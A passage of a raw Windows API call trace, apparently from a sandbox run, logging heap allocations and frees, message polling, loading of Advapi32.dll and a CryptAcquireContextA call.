returned 0x2e54e48 [0249.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.825] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0249.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0249.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0249.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0249.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0249.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0249.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0249.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0249.827] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.827] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.828] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.828] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0249.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0249.829] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0249.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0249.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.829] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0249.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.830] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0249.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0249.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0249.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0249.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0249.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.831] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0249.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0249.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0249.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0249.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0249.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0249.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0249.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0249.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0249.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0249.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0249.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0249.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0249.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0249.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0249.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0249.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0249.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.836] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0249.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0249.836] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a78 [0249.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.836] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0249.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0249.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0249.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0249.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0249.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) 